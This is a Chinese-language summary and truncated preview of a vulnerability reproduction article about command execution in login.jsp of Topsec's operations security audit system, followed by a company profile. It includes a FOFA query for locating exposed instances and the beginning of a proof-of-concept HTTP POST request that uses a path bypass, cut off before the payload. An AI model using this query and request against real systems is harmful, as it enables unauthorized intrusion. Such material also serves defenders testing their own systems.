主要观点总结
本文介绍了融云安全的技术文章及其相关信息,提醒读者仅供学习和参考,禁止用于其他用途。文章主要描述了天融信运维安全审计系统存在的命令执行漏洞及如何利用工具进行漏洞检测和复现。同时,也介绍了江西渝融云安全科技有限公司的相关信息和业务亮点。
关键观点总结
关键观点1: 文章用途和警告
文章仅供网络安全人员对其网站、服务器等进行检测和维护参考,未经授权不得用于任何入侵操作,造成的后果由使用者负责。提供的工具仅供学习,禁止他用。
关键观点2: 漏洞描述和复现
天融信运维安全审计系统login.jsp存在命令执行漏洞。可以使用特定的请求和操作来复现这个漏洞,如使用POST请求特定的URL并执行特定的操作。
关键观点3: 公司简介和业务亮点
介绍了江西渝融云安全科技有限公司的发展历程、业务资质、荣誉和证书等。公司集云安全、物联网安全、数据安全等为一体,并提供一系列的安全服务。
文章预览
0x01 阅读须知 融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 本文所提 供的工具仅用于学习,禁止用于 其他! ! 0x02 漏洞描述 天融信运维安全审计系统 login.jsp存在命令执行漏洞。 0x03 漏洞复现 fofa:header="iam" & & server="Apache-Coyote/" 1.执行poc进行echo无害操作,得到结果 POST /iam/synRequest.do;.login.jsp HTTP/1.1 Host : User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Connection : close Content-Length : 67 Content-Type : application/x-www-form-urlencoded Accept-Encoding : gzip method =trace_route =
………………………………